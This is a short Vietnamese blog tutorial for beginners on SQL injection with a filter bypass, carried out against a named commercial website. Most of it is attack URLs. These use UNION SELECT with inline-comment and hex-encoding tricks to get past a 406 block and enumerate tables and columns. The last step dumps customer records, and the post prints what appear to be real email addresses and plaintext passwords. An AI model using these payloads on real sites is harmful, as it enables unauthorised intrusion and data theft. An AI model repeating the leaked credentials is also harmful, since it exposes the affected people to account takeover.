Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.
Site:
+ Order by:
-->Ko lỗi.
+ -->lỗi.
+ --> + Tiến hành By pass:
-> 1
+Get table:
--> +Tiếp tục by pass:
--> + Get colums: customers
--> +Get id,email,password:
--> ----> Check PP .
Tut by Co0c.
Site:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
4|dpdurrell@hotmail.com|preston59
3|josh@uppertech.net|eeq7322
3|josh@uppertech.net|eeq7322
Tut by Co0c.
Không có nhận xét nào:
Đăng nhận xét